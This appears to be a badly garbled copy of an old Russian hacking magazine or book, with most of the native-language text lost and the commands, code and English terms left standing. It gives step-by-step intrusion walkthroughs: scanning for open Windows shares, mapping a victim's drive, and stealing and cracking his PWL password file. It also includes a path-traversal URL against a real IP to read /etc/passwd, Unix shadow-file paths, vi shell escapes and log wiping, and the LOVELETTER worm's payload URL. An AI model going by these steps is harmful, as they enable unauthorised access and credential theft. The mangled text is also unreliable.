(exec) open
^@root^@rootpasswd^@/bin/csh i^@
Warning: no access to tty; thus nojob control in this shell
# id
uid=0(root) gid=1(other)
9. .
,
, . .rhosts hosts.equiv., ,
, . DNS NIS .
EssentialNetTools 2.2 , Internet , EssentialNetTools 2.2. . , . ,
. , ,
, Add Record. . , : ,
,
(pwl, user.dar, system.dat ...). , Internet, Microsoft,
.
(EssentialNetTools ). NBScan IP
, . , RS YES, IP NATShell(starting ip = ending ip), use default NAT list . Go ( , ).
, . LMHost IP ,
, IP
. : NBScan, Open Computer. ,, ,
Share. Share Name \\\ , , Mount.
,
.
NetTool (, Essential) , ,
( , NBScan , ).
Internet
, , . .
, .
. ,
. : , .
Internet , , .
. ,
: , ( , ). :
, , , , , , ,
. : ,, ?: ( ) , .
.
, , : ,
. : Lta13?Lp ! : ! ,
: ,, .. ,
. , , .
!
, , . DialUp . , . , , ,
, . , , : , Internet .
Windows
95/98? , Windows 95/98 , PWL. ,
, , (,), PWL. ,
, ,
(HIEW, QVIEW), . MSPWL32.DLL. . ( N) . .
N (X). X+N, 8 , (Y). X+Y, 8, (Z).
XOR Z , , ( , ?). ? ( ).
( ), XOR. , . , xor
byte ptr [eax+ebp],cl. , ? ,
.
, ,
. ,
30h,0Ch, 28h . . MSPWL32.DLL , 511h ( , ), 90h,90h, 90h NOP (). ,
! ? ! . !!! , : / , , !
, , . , Windows : .,
MSDOS, , .
, , PWL, Windows :
, ,
Windows , . ? ! ! USER.DAT! : Windows 95 M. D.! , Internet,
email . , , , , ( ). email, ( ). :
M. D.! POP3 , DialUp! ? . email PWL, USER.DAT, , , ! ??? !
UUE, , 8 10. .
10 . 30h, , 7Ah,
30h 9 10
. ! , no sex for you. ,
30h, 9 10
. . , 3Dh. , 0Dh( ) + 30h. 0Dh, 0Ah: .
, , : ! , . : Internet Mail, & reg; . REGEDIT, HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail/POP3/: Password. Internet Mail. ,
, . , , , , .
. REGEDIT, / . , (*) .. . , () 3Dh
! 15.
? ,, , , ? !
, USER.DAT. HKEY_CURRENT_USER/RemoteAccess/Addresses: . , , ,! ,
, ( XOR). ASCII (, , ,
, : , , ?)
SPYWIN, HOOKDUMP, KEYWITNESS. ,
?).
HKEY_CURRENT_USER/RemoteAccess/Profile/""/IP: 0Ch
DNS,
..
HKEY_CURRENT_USER/RemoteAccess/Profile/""/User: .
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/InternetSettings/ProxyServer: Proxy .
HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail:
DefaultPOP3Server:
DefaultSMTPServer:
SenderEMail:
Name:
Organization:
.
POP3 "POP3":
Account: Password: ,
, ? , ? .
.
, .
: Internet.
! , , , , .
, , , ? , ,
Internet ,, . , ( )
. ,
. ? Windows 95/98/NT Legion. IP
, , ,
, , . , , , Internet,
, . , , ,
. , ?
, . , Windows 95/98/NT ,
, . , IP
IP,
. , . ,
www.lamerishe.ru. mIRC, IRC status : /whois*.lamerishe.ru.
:
#RUSSIAN Andrey H andrey@dialup
28059.lamerishe.ru :0 hello.*.junk.com
End of /WHO list.
:
/dns Andrey
mIRC IP
:*** Looking up dialup
28059.lamerishe.ru
*** Resolved dialup
28059.lamerishe.ru to 121.31.21.10
IP (121.31.21.10) . IP
Windows. MSDOS. e: Enter
IP .
Legion Enter Start IP ( IP) Enter End IP ( IP).
Enter Start IP: 121.31.21.1
Enter End IP: 121.31.21.254
Scan. , , \\121.31.21.87\C, IP C.
MAPPED ONDRIVE E:. , IP , c ( ) . . (
), , , . , .pwl, .
Enter.
. Windows . : E:\>dir win* :
: 224715D0
:\WIN95 113098 6:48p WIN95
0 (,) 0
1 (,) 287,997,952
:
E:\>cd win95E:\WIN95>dir *.pwl
: 224715D0
:\WIN95
ANDREY PWL 730 020599 10:31p
ANDREY.PWL
1 (,) 730
0 (,) 287,997,952
E:\WIN95>copy andrey.pwl
c:\hacking\pwlhack
, .pwl, .
Internet. :
: L5tRe
fsa3Xfa12
,
E:\121.31.21.87\C, . . ? pwlhack andrey.pwl.
C:\HACKING\PWLHACK>pwlhack.exe /list
andrey.pwl andrey(C) 17Apr1998y by Hard Wisdom
"PWL's Hacker" v3.0 (1996,97,98)
Enter the password:
File 'ANDREY.PWL' has size 730
bytes, version [NEW_Win95_OSR/2]
for user 'ANDREY' with password ''
contains:
[Type][The resource location
string][Password]
Dial X *Rna\
lamerishe\L5tRe fsa3Xfa12
Indexed Entryes: 1; Number of
resources: 1.
!, , ,
: fsa3Xfa12
Internet,, , ( www.lamerishe.ru) ,
Internet. , .
,
Netbus1.0, Netbus Pro 2.0,BackOrifice .. , , IP , , ,
IP.. .
, ? . .
PGPMail .
.
. , , . , Del
. . . , INF (
). http://www.xakep.ru/soft/5/reg2inf.exe. , , . , INF
, CSU , :
[Version]
Signature="$$"
LayoutFile=bla.inf
[DefaultInstall]
DelReg=del.Reg
[del.Reg]
HKCU,"SOFTWARE\Microsoft\Internet
Explorer\main","Home Page"
,
Add :
0,""
. , INF CSU.INF ( , ,
, ). :
RUNDLL.EXE SETUPX.DLL,InstallHinfSection DefaultInstall 64 c:\csu.inf
.
. USER.DA0 SYSTEM.DA0 ( backup ). , . ,
CSU.INF, CSUADD.INF, :
RUNDLL.EXE
SETUPX.DLL,InstallHinfSection
, :
(Windows 9x
GetTickCount() ) . , ,
(Windows 9x,Windows NT).
LAN Manager( NT: 4.00 NT4,5.00 Windows 2000).
: Master Browser,Backup Browser, PDC,BDC, RAS dialin server.
, ,
, Windows NT. netuse \\1.2.3.4\IPC$ password /user:username. ,
shared resources, , , .
(
Guest, . shared resources .
, . , .
, shared resources.
:
NetBIOS overTCP/IP 135
139 firewall
1 HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous
( , ; ).
Guest
loginstation restrictions
account lockout , , ,
.
NT IP (NetBIOS , ).
: ANONYMOUS, ( )
, .
, ( 6 ). Dual Celeron 400MHz 96Mb RAM 128 .
. Intruders list,
BlackICE, .
254
.
:
Null session 102
6.7%
Guest 1 57
3.7%
:
10% Windows
40% Windows, NetBIOS
over TCP/IP, ()
share, Internet,
: Windows NT, (CONNECT: Administrator:.
1524
100%
ping 442
29%
2 45 3.0%
1 .. IPC$
2 , .
102 100%
Windows 95/98 58 57%
Windows NT SAMBA 44 43%
177 100%
10 6%
,
10 6%
Shared resources
278 100%
171 62%
91 33%
telnet c 139 . nbtstat. , Windows 95
IP , Scan Range/Enter Start IP Scan Range/Enter End IP. ,
Windows NT, ,, , .
LEGION 2.1
Legion 2.1, Rhino9,
share , . , .
IP, . x.x.x.1 x.x.x.255, . Scan Type/Scan Range,
10.20.30.1 10.20.31.255 10.20.30.x 10.20.31.x. , IP , IP. Connection Speed Scan.
:
IP
.
A,M C 195.239.3.48 SPEDIA 195.239.3.64.
MapDrive, Windows.
LAN NetBios. , .
Legion IP
. NT4 Server Workstation, Windows 95/98. Pentium 100, 32 MB RAM, Windows NT4 / Windows98, 28.8 kbps modem. .
Legion NetBios
LAN, , firewall
. , . ,
.
Legion NT5
Legion NT5, .
Internet . , . , .,
, . , ,
.
,, , , . , , ,
distributed.net, RSA RC5 64 .
, , , .
, , , . , , , , ,
.
. , , .
, . , .
. ,
) (UNIX/UNIX; ROOT/ROOT;ADMIN/ADMIN; SHELL/SHELL;GUEST/GUEST ..). Ha UNIXe
(
. , . , .
Internet:
, UNIX,
shell.
UNIXshella , (
( ) etc, passwd. , , , : ( ) passwd. , ,
. Ha 10 200 . , , UNIX Crack , DOS CrackerJack.
,
*, .
/etc/shadow
, , . :
/etc/security/passwd
/tcb/auth/files/ /
/tcb/files/auth/?/
/etc/master.passwd
/etc/shadpw
/etc/shadow
/etc/tcb/aa/user/
/.secure/etc/passwd
/etc/passwd[.dir|.pag]
/etc/security/passwd.adjunct ##username
/etc/shadow
/etc/security/* database
/etc/auth[.dir|.pag]
/etc/udb
Ho ,
. . ( ) getpwent(), pp (www.spider.ru) pp
. p, , passwd : +::0:0:::. ,
NIS (Network Information Server)/YP (Yellow Pages). , ypcat passwd .
VMS, SYS$SYSTEM:SYSUAF.DAT. VMS
Internet
CHECK_PASSWORD GUESS_PASSWORD, , , .
shell. vi :set shell=/bin/sh, shell :shell. , passwd, . , /etc/utmp,/usr/adm/wtmp, /usr/adm/lastlog.
vi , .
( ) Internet , ,
. Internet , Internet . .
. , , . . .. @
. , @ , :[email protected]. ( , ,
, :name_prov_login.txt).
,
. , , IP, .
transparent proxy server
. , ( , , , ,
). . passlist.zip (*.zip ) http://www.astalavista.box.sk/, , , . , , , ,name_prov_pass.txt, , .
proxyserver
no transparentproxyserver,
transparent proxy server . , . , email. email IP. , proxyserver. , . IP Kiss.Ru. , , , , IP.
:
IP
var ip=document.f1.ip.value;
document.write(ip);
//>
login. . , , ,
, , IP. CGI. , , . . ADDR HOST, , notransparent.
WWW .
, , NEWBUGS , , . . , . ,
, . . , FTPd, . . , HACKCRACK, HACKZONE HOLM . DoS ( ), shell. .
rootshell.
CGI. CGI, (Perl, PHP, CGI).
CGI CitForum. , . ( ) CGI,
. ! printstat.cgi. :
printstat cgi?action=print&con=con&con
. 195.34.32.10. http://195.34.32.10/cgibin/webplus?scripts=/../../../../etc/passwd.
!
printstat.cgi?action print&con con&con2=lpt1&id=csu
CSU. , con2
, , (, lpt1, print. display ..). , , GRINDER. . , , UNIX. . IP . ,
, . , 1.1.1.1 255.255.255.255 /cgibin/webplus.cgi. IP,
! . . John the Ripper. , , . .
VBS.LOVELETTER
ILOVE YOU. ,
( Outlook Lotus Notes). ILOVEYOU, kindly check the attached LOVELETTER coming from me. LOVELETTERFORYOU.TXT.vbs. c:\windows Win32DLL.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServices\Win32DLL. c:\windows\system MSKernel32.vbs LOVELETTERFORYOU.TXT.vbs.
MSKernel32 vbs
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk
4jnHHGbvbmKLJKjhkqj4w/WIN BUGSFIX
MSKernel32.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServices\MSKernel32.
. , c:\windows\system\LOVELETTERFORYOU.TXT.vbs. , .
WINFAT32.EXE , Internet WINBUGSFIX.EXE. , :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WINBUGSFIX. about:blank (). , . ( FAT32). ,
, . . WINBUGSFIX.EXE
,
. . ,
. ,
, . .jpg, .jpeg, .js, .vbs, .css, .vbe, .jse, .hta, .sct, .whs, . mp2 mp3. hidden , vbs. , queen_tsmgo.mp3, queen_tsmgo.mp3.vbs. c:\windows\system LOVELETTERFORYOU.HTM, MSKernel32.vbs.
mIRC SCRIPTS.INI (
. mIRC , . ). , IRC, . , .
. , . Very funny, Joke Mothers Day Order Confirmation ( mothersday.vbs). . . , . , , .jpg .INI .BAT.
, . .
, , .
Context kindly check the attached LOVELETTER coming from me. email [email protected] [email protected].
XXX . (, copy,from . . ,
).
type=button, submit, reset, text ), checked / . ,
.
) ,
METHOD. ( , ): POST GET. POST
, GET . , ACTION=http://csu.ru/cgibin/xxx.cgi, : uname=hellerpasswd=xxxxxxxx,
http://csu.ru/cgibin/xxx.cgi?uname=heller&passwd=xxxxxxxx.
. : . : type ( INPUT. ,button , reset
, submit ,text , radio ( ) checkbox ),name , value (
, (:
action="mailto:[email protected]?Subject=
"CSU"")
( ), , , .
VBScript. ,
. :
,
,
>
VBSCRIPT
. . PLAY. sub
PLAY end sub ./
/body
, . ONCLICK=PLAY(). , , PLAY. JavaScript. VBScript , HTML. VBScript HTML
>
. , Script, .
, ( HTML VBScript , JavaScript).
dim c
/ . c . :
c=document.f1.t1.value
, . :
document.f1.t2.value=c
! :
,
,
>
VBSCRIPT
dim c
sub play
value=Enter onclick=play()>
c=document.f1.t1.value
document.f1.t2.value=c
end sub
>
. . HTML. :
1 100
:
1 100
v=cInt(v)
if qv then
alert " "
:
dim q
dim v
dim p
randomize
sub start
q=int(rnd(1)*100+1)
p=0
alert " 1 100"
end sub
sub play
p=p+1
v=document.f1.t1.value
if q=v then
document.write ("
"&p&" ")
end if
end sub
>
,
, . . , .
( ), . , ( )
. . ,
, . ,
. .
,
., .
, . . .
, , , . , . Legion.
. IP , Map Drive. , .
Legion 2.1? . , , Net BIOSa ,
, . , sharinga. EssentialNetTools, Legion, .
scriptkiddie. cgibugs cgi .
cgi Voideye. , ,Damned CGI Scanner 2.1. . , , , void.ru .
Internet.
.
, , , cgi.
,
. , , , .. . . .
, DCS 2.1 Essential Tools, . , Xavior .
. , .
( ). .
Internet. .
, ,
, , . : ( ) ,
, . , ......
1 . ,
, .. , .. ,
, .
.
.
. :
, 13 , , . .
.
, .
.
.
.
, . ,
:,
?
, , ?
. Internet .
, , 6 .
?
,
, , .. , .
, ,
. 40 . , .
?
!
( ) ,
( ) . . , , . , ,
, , .
.
. ,
, , .
, ?
, ?
? ???
. , . . .
: ,, , .
, . ?
???
.
, . hacker.
31337.?
1. , . .
2. ,
! .
.
. , . .
2 . . , , . ,
. . .
, .
3. ,
, , . , Inetfordollars, [email protected],
.
4.
, email telnet ,
., [email protected], :[email protected].
5. , , .
6.
( ) . ,
, , Internet.
.
7. .
, , , . , Internet.
Spedia
, Internet . , ,
, .
, ,
, , !
,
.
Spedia! , 0.60$ ,
, . , ?, . Internet
, , , . , , ?
Spedia , , . 2 .
30 . $ .
25% ;
, ;
300 ! : :
, , Internet, , ,
0.5 ; ,
(email) ;
, , ;
,
.
Spediabar, , , Tools Make Money Download. .
, ! !
WWW ( www.mail.ru)
A V Komlin avkvladru@netscape net
http://cyberportal.narod.ru
: tHe karamba
IPtools
: Pupkin Zade
A.V. Komlin [email protected]
(http://dore.on.ru/kpnc)
FINNAN ([email protected])
: Choosen
:
ANSI.SYS
: Alexander Ermakov
AVP
: ZaDNiCa
AVP
: dr.golova
*.BAT ? *.BAT !
: gaszZone
: PupkinZade
http://kssoft.mastak.com/users/kssoft/iptools.eng/index.htm
IPX
:
(user manual)
: zLOB
http://zlob.bos.ru
MTC: Cfyz
CD KERNEL32.DLL
: Green Mouse
: http://www.emedia.ru/
: Travelling Wind
http://rayon.promedia.minsk.by
: Reanimator
: zLOB
http://www.zlob.net.ru/
!
http://www.4prohack.cjb.net
Windows Internet
Maxim V. Stepin. EMail: [email protected]
Telnet
: =Sky12dooR=
.
: Yarix;
Windows
: =BFG=
Windows:
: Epsilon
:
MOOF ([email protected]; http://AnyNews.da.ru)
Hacker Team
hacker [email protected]
FAQ
relcom.fido.ru.hacker
Windows Internet
DS Windows
4prohack
http://www.4prohack.cjb.net
Windows
GrayFlint
?
Internet:
Internet
proxyserver
WWW
C C
?
exploit?
root?
!
UIN: Bugs, Crack SocialIngineering
Internet
Internet
shared Internet
Internet Windows Me
LEGION 2.1
VBS.LOVELETTER
VBScript
Spedia
:
.127591, , ., . 53. . 1.
http://www.bookpress.ru